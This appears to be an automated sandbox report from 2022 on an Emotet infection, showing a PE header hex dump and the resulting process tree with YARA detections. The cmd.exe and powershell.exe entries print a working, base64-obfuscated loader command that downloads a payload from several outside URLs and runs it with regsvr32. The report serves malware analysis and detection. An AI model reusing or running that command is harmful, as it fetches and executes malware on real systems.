                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikkikkikRichikPEdv{b" 5T@P .text `.rdataT @@.data7@.pdata@@.rsrc@@.reloc@B


                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:08:57:42
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe" /v:on /c DZ9UkEaBzDep9CltZVGcsQuzGzfPdwf8nTfLANcu0jNEGxiW7YvnGsgahEnFDklFWCuez6Py||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}
                                                                                                    Imagebase:0x7ff7bb450000
                                                                                                    File size:273920 bytes
                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:1
                                                                                                    Start time:08:57:43
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff647620000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:2
                                                                                                    Start time:08:57:44
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe -c "&{$vFL=[System.Text.Encoding]::ASCII;$FhuEB='ICAgICAgV';$TCeK='3JpdGUtSG9zdCAiemdmSXoiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYW5kb20uY28uaWQvYXNzZXRzL1RwSUl0N1NtTkJzV0NFQ0xvSHJTLyIsImh0dHA6Ly95YW1hZGEtc2hvc2hpLm1haW4uanAveWFtYWRhLXNob3NoaS9WNjFoSC8iLCJodHRwczovL2Jwc2phbWJpLmlkL2Fib3V0L1ZQZTY5QTlUay8iLCJodHRwOi8vbWFybWFyaXMuY29tLmJyL3dwLWFkbWluLzJjZnBTdUFILyIsImh0dHA6Ly9tYXNpZGlvbWFzLmNvbS9ENFdTdGF0cy9HQWhtZ3ZoTGdVbjYvIiwiaHR0cDovL3BhY2VtYWtlci5jZC9pbWFnZXMvWGMvIik7JHQ9Ikp5ZGdWdmJQRCI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxNZXZnTXZvcGF3LkJVUztSZWdzdnIzMi5leGUgIiRkXE1ldmdNdm9wYXcuQlVTIjticmVha30gY2F0Y2ggeyB9fQ==';$cFq=[System.Convert]::FromBase64String($FhuEB+$TCeK);$YnYHG=$vFL.GetString($cFq); iex ($YnYHG)}"
                                                                                                    Imagebase:0x7ff6ba650000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:high

                                                                                                    Target ID:6
                                                                                                    Start time:08:57:54
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\JydgVvbPD\MevgMvopaw.BUS
                                                                                                    Imagebase:0x7ff622140000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.302284085.0000000001DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.302481665.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:7
                                                                                                    Start time:08:57:57
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:8
                                                                                                    Start time:08:58:01
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:9
                                                                                                    Start time:08:58:03
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\UjKMhzOwg\JWwyPPSZDhCDc.dll"
                                                                                                    Imagebase:0x7ff622140000
                                                                                                    File size:24064 bytes
                                                                                                    MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.528233629.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.526430630.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    Target ID:10
                                                                                                    Start time:08:58:03
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Target ID:11
                                                                                                    Start time:08:58:05
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:12
                                                                                                    Start time:08:58:06
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                    Imagebase:0x7ff7ef700000
                                                                                                    File size:163336 bytes
                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:13
                                                                                                    Start time:08:58:07
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:14
                                                                                                    Start time:08:58:07
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:15
                                                                                                    Start time:08:58:10
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:16
                                                                                                    Start time:08:58:11
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:18
                                                                                                    Start time:08:58:48
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:21
                                                                                                    Start time:08:59:07
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                    Imagebase:0x7ff678970000
                                                                                                    File size:455656 bytes
                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:22
                                                                                                    Start time:08:59:08
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff647620000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:24
                                                                                                    Start time:08:59:18
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Target ID:26
                                                                                                    Start time:08:59:38
                                                                                                    Start date:23/05/2022
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7338d0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    No disassembly